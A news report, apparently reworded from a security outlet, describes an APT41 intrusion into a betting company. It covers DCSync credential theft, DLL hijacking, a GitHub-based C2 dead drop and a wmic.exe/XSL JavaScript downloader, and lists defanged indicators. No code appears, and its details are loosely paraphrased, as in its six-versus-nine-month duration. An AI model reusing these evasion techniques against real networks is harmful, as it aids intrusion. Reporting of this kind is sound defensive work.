APT41, a Group of Chinese Hackers, Strikes the Betting Sector to Generate Profits
A sophisticated cyber assault targeting the betting and gaming sector has been linked to the adept Chinese state-backed group known as APT41 (also known as Brass Typhoon, Earth Baku, Wicked Panda, or Winnti), according to a statement shared with The Hacker News by Ido Naor, the co-founder and CEO of the Israeli cybersecurity firm Security Joes. Naor revealed that the hackers stealthily extracted crucial data from the victimized company over a span of at least six months, involving network configurations, user passwords, and data from the LSASS process.
During the breach, the attackers continuously updated their toolkit in response to the security team’s countermeasures. By monitoring the defenders’ actions, they adjusted their strategies and tools to elude detection and sustain persistent access to the compromised network.
The intricate assault, which lasted nearly nine months this year and was aimed at one of its clients, overlaps with an intrusion set associated with cybersecurity provider Sophos, identified as Operation Crimson Palace.
According to Naor, the company acted on the incident four months ago, stating, “These hacks rely on decisions by state-sponsored entities. This time, we strongly suspect that APT41 was motivated by financial gains.”
The scheme is orchestrated with stealth in mind, employing various techniques to accomplish its objectives. It uses a customized toolkit to circumvent security measures in the environment, extract critical data, and set up concealed channels for persistent remote access.
Security Joes characterized APT41 as “skilled and systematic,” emphasizing their capability to launch espionage operations and contaminate the supply chain, resulting in intellectual property theft and financially driven attacks like ransomware and cryptocurrency mining.
The specific initial infiltration method used in the assault remains unknown, but indications point towards spear-phishing emails, considering the absence of active vulnerabilities in publicly accessible web applications or a supply chain breach.
Once inside the targeted network, the perpetrators executed a DCSync attack to obtain password hashes of service and admin accounts, broadening their access. With these credentials, they established persistence and retained control over the network, especially focusing on administrative and development accounts.
The hackers diligently carried out reconnaissance and post-exploitation activities, adjusting their toolkit to counter defensive measures and elevate their privileges, ultimately aiming to download and run additional malicious payloads.
Among the methods employed to achieve their objectives are Phantom DLL Hijacking, leveraging the legitimate utility wmic.exe, and exploiting their access to service accounts with administrator rights to initiate execution.
In the succeeding phase, a malicious DLL file named TSVIPSrv.dll is fetched via the SMB protocol. Subsequently, the payload connects to a predefined command-and-control (C2) server.
“In case the predefined C2 fails, the implant endeavors to update its C2 details by mining GitHub profiles using this URL: github[.]com/search?o=desc&q=pointers&s=joined&type=Users&.”
“The malware combs through the HTML output from the GitHub query, seeking sequences of capitalized terms separated solely by spaces. It retrieves eight such words, extracts the uppercase letters between A and P, generating an 8-character string that encodes the IP address of the new C2 server used in the attack.”
The initial interaction with the C2 server allows for profiling the infected system and fetching further malware for execution through a socket connection.
Security Joes noted that following the detection of their actions, the threat actors remained dormant for a few weeks before returning with a refined strategy. This involved executing heavily obfuscated JavaScript code within an altered iteration of an XSL file (“texttable.xsl”) employing the LOLBIN wmic.exe.
“When the command WMIC.exe MEMORYCHIP GET is triggered, it indirectly loads the texttable.xsl file to format the output, leading to the execution of the injected malicious JavaScript code,” explained the researchers.
The JavaScript acts as a downloader, utilizing the domain time.qnapntp[.]com as a C2 server to receive a subsequent payload that profiles the machine and transmits the information back to the server, subject to specific filtering criteria likely designed to target only relevant machines.
“The intentional targeting of devices with IP addresses containing ‘10.20.22’ stands out in the code,” the researchers remarked.
“This indicates a focus on specific devices, particularly those within the subnets 10.20.22[0-9].[0-255]. By analyzing this data alongside network logs and the IP addresses of affected devices, we deduced that the attacker applied this filtering mechanism to impact solely the devices in the VPN subnet.”
About Author
